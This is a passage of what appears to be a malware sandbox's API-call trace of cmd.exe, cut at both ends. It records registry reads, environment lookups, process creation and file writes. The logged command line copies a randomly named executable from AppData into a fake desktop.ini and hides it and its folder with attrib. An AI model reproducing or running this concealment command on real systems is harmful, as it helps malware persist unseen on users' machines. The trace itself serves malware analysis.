lpData=0x12ebe0*=0x1, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x1, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x0, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x9, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x9, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x9, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegCloseKey (hKey=0x40) returned 0x0 [0202.530] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.530] srand (_Seed=0x5b8863a4) [0202.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"" [0202.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"" [0202.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.531] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b1c10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.531] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.531] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.531] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.531] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.531] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.531] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.531] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.531] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.531] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.531] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.531] GetEnvironmentStringsW () returned 0x2b2600* [0202.531] FreeEnvironmentStringsW (penv=0x2b2600) returned 1 [0202.531] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.531] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.531] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.531] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.531] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.531] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.531] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.531] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.531] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.531] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f9a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.532] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f9a0, lpFilePart=0x12f99c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f99c*="Desktop") returned 0x18 [0202.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.532] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f71c | out: lpFindFileData=0x12f71c) returned 0x2b0c90 [0202.532] FindClose (in: hFindFile=0x2b0c90 | out: hFindFile=0x2b0c90) returned 1 [0202.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f71c | out: lpFindFileData=0x12f71c) returned 0x2b0c90 [0202.532] FindClose (in: hFindFile=0x2b0c90 | out: hFindFile=0x2b0c90) returned 1 [0202.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f71c | out: lpFindFileData=0x12f71c) returned 0x2b0c90 [0202.532] FindClose (in: hFindFile=0x2b0c90 | out: hFindFile=0x2b0c90) returned 1 [0202.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.532] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.532] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.532] GetEnvironmentStringsW () returned 0x2b04b0* [0202.533] FreeEnvironmentStringsW (penv=0x2b04b0) returned 1 [0202.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.533] GetConsoleOutputCP () returned 0x1b5 [0202.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.533] GetUserDefaultLCID () returned 0x409 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fae0, cchData=128 | out: lpLCData="0") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fae0, cchData=128 | out: lpLCData="0") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fae0, cchData=128 | out: lpLCData="1") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.534] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.535] GetConsoleTitleW (in: lpConsoleTitle=0x2a0ad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.535] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.535] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.535] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.535] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.536] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0202.536] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0202.536] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0202.536] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0202.536] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0202.536] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0202.536] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0202.538] _wcsicmp (_String1="del", _String2=")") returned 59 [0202.538] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0202.538] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0202.538] _wcsicmp (_String1="IF", _String2="del") returned 5 [0202.538] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0202.538] _wcsicmp (_String1="REM", _String2="del") returned 14 [0202.538] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0202.540] _wcsicmp (_String1="type", _String2=")") returned 75 [0202.540] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0202.540] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0202.540] _wcsicmp (_String1="IF", _String2="type") returned -11 [0202.540] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0202.540] _wcsicmp (_String1="REM", _String2="type") returned -2 [0202.540] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0202.545] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.545] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.556] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.557] FindClose (in: hFindFile=0x2b2560 | out: hFindFile=0x2b2560) returned 1 [0202.557] FindClose (in: hFindFile=0x2b2560 | out: hFindFile=0x2b2560) returned 1 [0202.557] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0202.557] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0202.557] GetConsoleTitleW (in: lpConsoleTitle=0x12f508, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.558] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f390, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f458 | out: lpAttributeList=0x12f390, lpSize=0x12f458) returned 1 [0202.558] UpdateProcThreadAttribute (in: lpAttributeList=0x12f390, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f450, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f390, lpPreviousValue=0x0) returned 1 [0202.558] GetStartupInfoW (in: lpStartupInfo=0x12f34c | out: lpStartupInfo=0x12f34c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0202.558] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.559] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f3ec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f438 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", lpProcessInformation=0x12f438*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe74, dwThreadId=0xeb8)) returned 1 [0202.561] CloseHandle (hObject=0x4c) returned 1 [0202.561] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.561] GetEnvironmentStringsW () returned 0x2b09e0* [0202.561] FreeEnvironmentStringsW (penv=0x2b09e0) returned 1 [0202.561] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0202.919] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f32c | out: lpExitCode=0x12f32c*=0x0) returned 1 [0202.919] CloseHandle (hObject=0x50) returned 1 [0202.919] _vsnwprintf (in: _Buffer=0x12f474, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f338 | out: _Buffer="00000000") returned 8 [0202.920] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0202.920] GetEnvironmentStringsW () returned 0x2b25b0* [0202.920] FreeEnvironmentStringsW (penv=0x2b25b0) returned 1 [0202.920] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.920] GetEnvironmentStringsW () returned 0x2b25b0* [0202.920] FreeEnvironmentStringsW (penv=0x2b25b0) returned 1 [0202.920] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f390 | out: lpAttributeList=0x12f390) [0202.920] GetConsoleTitleW (in: lpConsoleTitle=0x12f710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.920] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\desktop.ini")) returned 0xffffffff [0202.921] GetLastError () returned 0x2 [0202.921] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1")) returned 0x10 [0202.921] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0202.921] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0202.921] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\desktop.ini")) returned 0xffffffff [0202.921] GetLastError () returned 0x2 [0202.921] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12f1bc | out: lpConsoleScreenBufferInfo=0x12f1bc) returned 1 [0202.921] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0202.923] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0202.923] GetConsoleTitleW (in: lpConsoleTitle=0x12f6ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0202.923] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.924] GetFileType (hFile=0x50) returned 0x1 [0202.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.924] GetFileType (hFile=0x50) returned 0x1 [0202.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.925] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.927] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.927] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.928] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.928] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: 